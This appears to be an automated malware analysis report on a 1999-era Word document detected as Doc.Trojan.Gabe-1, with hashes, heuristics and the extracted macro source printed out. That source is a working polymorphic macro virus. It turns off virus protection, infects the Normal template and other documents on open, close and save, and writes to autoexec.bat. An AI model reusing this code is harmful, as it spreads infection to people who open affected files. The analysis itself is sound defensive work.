Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 5ddd70e9b1e3d820…

MALICIOUS

Office (OLE)

Size: 50.0 KB
Created: 1999-04-23 11:57:00
Authoring application: Microsoft Word 8.0
First seen: 2012-06-14
MD5: 780367655aaf25cdb382e51b06ece000
SHA-1: 50273ca0886014c586a81dca4d5c0d94cc57c21e
SHA-256: 5ddd70e9b1e3d820c6ce51013df29371a5a168371959644312be8bb8f8583880
Risk Score: 240

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1566.001 Phishing: Spearphishing Attachment

The sample is a legacy Word document containing both WordBasic and VBA macros. The AutoOpen macro attempts to obfuscate its own code (appending random comment text to each line) and to copy itself into the Normal template (NormalTemplate), a common technique for persistence and for infecting documents opened later. It also attempts to append to C:\autoexec.bat, indicating an intent to execute further code at system startup.

Heuristics (5)

  • ClamAV: Doc.Trojan.Gabe-1 (severity: critical; rule: CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Trojan.Gabe-1
  • VBA macros detected (severity: medium; 2 related findings; rule: OLE_VBA_MACROS)
    Document contains VBA macro code
  • AutoOpen macro (severity: high; rule: OLE_VBA_AUTOOPEN)
    AutoOpen macro
  • Auto_Close macro (severity: high; rule: OLE_VBA_AUTOCLOSE)
    Auto_Close macro
  • Legacy WordBasic auto-exec macro marker (severity: medium; rule: OLE_LEGACY_WORDBASIC_AUTOEXEC)
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence of the old Word macro execution surface, not a downloader or parser-CVE attribution by itself.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename   | Kind      | Source                                                  | Size
macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source)     | 13351 bytes

SHA-256: 9217257ae52fe44583b5edd4426c78661d1a873ce1a623fe70dbb1214d8e38eb
Detection: ClamAV: Doc.Trojan.Gabe-1
Obfuscation or payload: unlikely

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "fUY"
Sub AutoOpen()
'PolyMorphing Viruz by MI_pirat
'CodeNAME: Kewl--NOT!
On Error Resume Next
StatusBar = "<< Kewl lives somewhere in HERE >>"
If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\", "Kewl") <> "Kaka" Then
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\", "Kewl") = "Kaka"
Options.VirusProtection = (2 Xor 2)
Dim nr, xxx, nume
nume = Chr(Int((100 * Rnd) + 32)) + Chr(Int((100 * Rnd) + 32)) + Chr(Int((100 * Rnd) + 32))
ActiveDocument.VBProject.VBComponents(2).Name = nume
nr = ActiveDocument.VBProject.VBComponents.Item(2).CodeModule.CountOfLines
Set myTemplate = NormalTemplate
Application.OrganizerCopy Source:=ActiveDocument.FullName, Destination:=myTemplate.FullName, Name:=nume, Object:=wdOrganizerObjectProjectItems
For i = 1 To nr
xxx = ActiveDocument.VBProject.VBComponents(2).CodeModule.Lines(i, 1)
poly = Chr(Int((120 * Rnd) + 32)) + Chr(Int((120 * Rnd) + 32)) + Chr(Int((120 * Rnd) + 32)) + Chr(Int((120 * Rnd) + 32))
strn = xxx + " '" + poly
NormalTemplate.VBProject.VBComponents.Item(2).CodeModule.ReplaceLine i, strn
Next i
Documents.Open FileName:=NormalTemplate.FullName, ConfirmConversions:=False, ReadOnly:=False, AddToRecentFiles:=False, PasswordDocument:="", PasswordTemplate:="", Revert:=False, WritePasswordDocument:="", WritePasswordTemplate:="", Format:=wdOpenFormatAuto
ActiveDocument.Save
ActiveDocument.Close
'Some publicity doesn't hurt anyone
Open "C:\autoexec.bat" For Append As #1
Print #1, "@echo off"
Print #1, "echo MI_pirat"
Print #1, "echo Kewl LiVeS SoMeWhErE In YoUr SyStEm ---- ENDjoy"
Print #1, "echo."
Close #1
End If
End Sub
Sub AutoClose()
'Errr.. spead me
On Error Resume Next
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\", "K") = System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\", "K") + 1
If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\", "K") >= 10 Then MsgBox "Are U havn' phun ?", vbYesNo, "Kewl has spead considerably !"
Dim nume, myTemplate
myTemplate = NormalTemplate
nume = NormalTemplate.VBProject.VBComponents(2).Name
For Each aVar In ActiveDocument.Variables
    If aVar.Name = "Inf" Then num = aVar.Index
Next aVar
If (num = 0) And (ActiveDocument.FullName <> myTemplate.FullName) Then
ActiveDocument.Variables.Add Name:="Inf"
ActiveDocument.Variables("Inf").Value = 1
Set myTemplate = ActiveDocument.AttachedTemplate
Application.OrganizerCopy Source:=myTemplate.FullName, Destination:=ActiveDocument.FullName, Name:=nume, Object:=wdOrganizerObjectProjectItems
ActiveDocument.Save
End If
End Sub
Sub AutoSave()
'Sure...Hehe infect it everytime
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\", "K") = System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\", "K") + 1
If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\", "K") >= 10 Then MsgBox "Are U havn' phun ?", vbYesNo, "Kewl has spead considerably !"
On Error Resume Next
Dim nume, myTemplate
myTemplate = NormalTemplate
nume = NormalTemplate.VBProject.VBComponents(2).Name
For Each aVar In ActiveDocument.Variables
    If aVar.Name = "Inf" Then num = aVar.Index
Next aVar
If (num = 0) And (ActiveDocument.FullName <> myTemplate.FullName) Then
ActiveDocument.Variables.Add Name:="Inf"
ActiveDocument.Variables("Inf").Value = 1
Set myTemplate = ActiveDocument.AttachedTemplate
Application.OrganizerCopy Source:=myTemplate.FullName, Destination:=ActiveDocument.FullName, Name:=nume, Object:=wdOrganizerObjectProjectItems
ActiveDocument.Save
End If
End Sub

... (truncated)